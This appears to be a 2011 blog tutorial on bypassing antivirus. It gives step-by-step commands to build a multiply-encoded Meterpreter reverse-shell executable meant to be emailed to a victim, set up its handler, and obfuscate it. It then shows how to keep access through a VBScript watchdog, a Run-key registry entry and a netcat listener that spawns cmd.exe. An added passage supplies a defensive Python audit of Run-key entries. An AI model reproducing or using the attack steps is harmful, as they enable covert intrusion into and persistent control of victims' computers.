Antivirus Bypass
Written by Luca Sciortino
Tuesday, 01 November 2011, 01:00

This article describes the technique that hackers use to bypass any type of antivirus.
The end result will be a file (in this case an executable) that is sent by e-mail to the victim.

Step 1)

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.15 LPORT=443 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /root/test.exe

Step 2)

msfconsole

Step 3)

use multi/handler

Step 4)

set payload windows/meterpreter/reverse_tcp

Step 5)

set lport 443

Step 6)

set lhost 192.168.0.15

Step 7)

exploit

Step 8)

Use Xenocode Postbuild for .NET to obfuscate the code

Step 9)

Use a hex editor to fill up the dangerous syscall

Step 10) MAINTAIN ACCESS

Use mkdir to create a remote directory

Step 11)

Inject 2 files into the directory -> test.exe (a daemon process) and a persist.vbs like this:

' Watchdog loop: poll the process list every 5 seconds and relaunch test.exe if it is not running
state = 1
While state = 1
Set WshShell = WScript.CreateObject("WScript.Shell")
' WMI query for all running processes
Set colProcessList = GetObject("Winmgmts:").ExecQuery("Select * from Win32_Process")
For Each objProcess in colProcessList
If objProcess.Name = "test.exe" Then
vFound = True
End If
Next
If vFound = True Then
WScript.Sleep 5000
Else
' Not running: start it again (single backslashes, VBScript does not escape them)
WshShell.Run ("C:\<path where you deployed the files>\test.exe")
WScript.Sleep 5000
End If
vFound = False
Wend

Step 12)

Enumerate a remote registry key

reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (or HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run)

Step 13)

Add the new value to the registry (the value name containing a space must be quoted)

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (or HKCU) -v "Windows Live" -d "C:\path\test.exe"

If you want to use netcat as the value data instead:

C:\path\nc.exe -L -d -p 443 -e cmd.exe
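The defender's counterpart to steps 12 and 13, added here as an example and not part of the original article: a small audit of `reg query` output for the Run key that flags the patterns used above (an autostart image outside the usual install roots, netcat-style listener or shell-spawning arguments, a script interpreter or .vbs launched at logon). The sample output, the trusted roots and the environment-variable map are constructed assumptions.

```python
import re

# Constructed sample of `reg query HKLM\...\CurrentVersion\Run` output (not from a real host).
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    Windows Live    REG_SZ    C:\Users\Public\test.exe
    Updater    REG_SZ    C:\ProgramData\nc.exe -L -d -p 443 -e cmd.exe
    Persist    REG_SZ    wscript.exe C:\Users\Public\persist.vbs
"""

# Assumption: legitimately installed autostart binaries live under these roots.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
ENV = {"%windir%": "C:\\Windows", "%systemroot%": "C:\\Windows", "%programfiles%": "C:\\Program Files"}
VALUE_RE = re.compile(r"^\s+(.+?)\s{2,}(REG_\w+)\s{2,}(.*)$")      # name, type, data
SHELL_ARGS_RE = re.compile(r"-e\s+\S*cmd\.exe|-[lL]\s+.*-p\s+\d+", re.I)
SCRIPT_RE = re.compile(r"(?:^|\\)[wc]script\.exe\b|\.vbs\b", re.I)


def split_command(data: str):
    """Return (image_path, arguments) for the data of one Run value."""
    for var, val in ENV.items():
        data = re.sub(re.escape(var), lambda m: val, data, flags=re.I)
    data = data.strip()
    if data.startswith('"'):                      # quoted image, rest is arguments
        end = data.find('"', 1)
        return data[1:end], data[end + 1:].strip()
    m = re.search(r"\.exe\b", data, re.I)        # unquoted: cut after the first .exe
    if m:
        return data[:m.end()], data[m.end():].strip()
    head, _, tail = data.partition(" ")
    return head, tail


def audit_run_key(text: str):
    """Return {value_name: [reasons]} for Run entries worth an analyst's look."""
    findings = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if not m:
            continue
        name, _, data = m.groups()
        image, args = split_command(data)
        reasons = []
        if not image.lower().startswith(TRUSTED_ROOTS):   # also catches bare names resolved via PATH
            reasons.append("image outside trusted install roots: " + image)
        if SHELL_ARGS_RE.search(args):
            reasons.append("listener/shell-spawning arguments: " + args)
        if SCRIPT_RE.search(data):
            reasons.append("script interpreter or .vbs in autostart")
        if reasons:
            findings[name] = reasons
    return findings
```

Run the same function over `reg query` output collected from HKLM and HKCU; entries that pass these checks still deserve a hash or signature check, since the heuristics only rank what to look at first.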

Step 14)

ENJOY :-)

GAME OVER!

Luca
